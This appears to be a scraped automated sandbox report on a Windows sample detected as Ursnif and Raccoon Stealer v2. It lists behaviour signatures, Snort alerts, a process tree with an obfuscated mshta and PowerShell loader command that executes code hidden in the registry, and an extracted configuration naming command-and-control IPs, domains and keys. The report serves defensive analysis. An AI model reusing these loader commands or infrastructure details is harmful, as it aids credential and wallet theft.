Edit tour
Windows
Analysis Report
EJ6FBXJ9Dg.exe
Overview
General Information
Detection
Ursnif, Raccoon Stealer v2
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Ursnif
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus / Scanner detection for submitted sample
Hooks registry keys query functions (used to hide registry keys)
Writes or reads registry keys via WMI
Found evasive API chain (may stop execution after checking system information)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Found API chain indicative of debugger detection
Modifies the prolog of user mode functions (user mode inline hooks)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
PE file contains more sections than normal
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Extensive use of GetProcAddress (often used to hide API calls)
Uses Microsoft's Enhanced Cryptographic Provider
Classification
- System is w10x64
- EJ6FBXJ9Dg.exe (PID: 5144 cmdline:
C:\Users\u ser\Deskto p\EJ6FBXJ9 Dg.exe MD5: 5949348FEDECC598CDBCE7072639231F) - XHSRZM23.exe (PID: 1460 cmdline:
"C:\Users\ user\AppDa ta\Roaming \XHSRZM23. exe" MD5: B7CE4F9F6ECD85BB5EDBB6964226FDB6)
- mshta.exe (PID: 1120 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Ndam='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Ndam).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 5920 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name nhef owhe -valu e gp; new- alias -nam e ucvjneg -value iex ; ucvjneg ([System.T ext.Encodi ng]::ASCII .GetString ((nhefowhe "HKCU:Sof tware\AppD ataLow\Sof tware\Micr osoft\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E").UrlsR eturn)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 4568 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 4712 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\mkr2iq4 u.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 3320 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESF206.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC C9AB450BCF A441ED9B99 9D6FD5DE38 22.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 5956 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\jv54rgf 4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 5780 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESFF35.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 20F2306B39 284E32B5AB 6E9725E218 9D.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"C2 url": ["http://188.127.227.51/"], "Bot ID": "b3ca3fc91779633a47981045668e09c4", "RC4_key1": "b3ca3fc91779633a47981045668e09c4"}
{"RSA Public Key": "GEoaf/PsReruXzGPGUIgqWKnqoR7Hg9dOcT4nBssSx1nY9FAsRGi/E2tdzMI0njP6dLpZXQyBSxb2YN/N71RkIFe8BRQooe+s0DlXnJzyHYmt5vun+EavdlJKBsHKfikcIwJi8dHMcwPCVkp15cXW+FtNdcJ16MzDk0HRi26tZpwtGzsz5DaHHaw0yA6g52Dl8eUU+3S/MbS+zgMU3bd2jx4qwfKswaXM81OoMrm/tnuJLNFeIEk3OyzFEsObImHW4kh+539YoFhjTBOSMFqoVRYaZoeDOzojnXc0eoSRdCyTgvIwyzI4H4U/DMlfmvCLI5Axykns+KODb1pRLrq7RDL/5mrYprCWyjX3yV9fCU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "YFVenkBsAbUmuHYi", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *wallet* *bank* *banco*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "10103", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_Gozi_fd494041 | unknown | unknown |
| |
Windows_Trojan_Gozi_261f5ac5 | unknown | unknown |
| |
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security | ||
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security | ||
Click to see the 70 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security | ||
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security | ||
Click to see the 29 entries |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp: | 192.168.2.4188.127.227.5149697802036934 10/13/22-08:48:01.271816 |
SID: | 2036934 |
Source Port: | 49697 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 188.127.227.51192.168.2.480496972036955 10/13/22-08:48:01.638382 |
SID: | 2036955 |
Source Port: | 80 |
Destination Port: | 49697 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.4188.127.227.5149697802038916 10/13/22-08:48:01.701614 |
SID: | 2038916 |
Source Port: | 49697 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | Metadefender: | Perma Link |
Source: | Avira: |
Source: | Joe Sandbox ML: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | URLs: |
Source: | HTTP traffic detected: |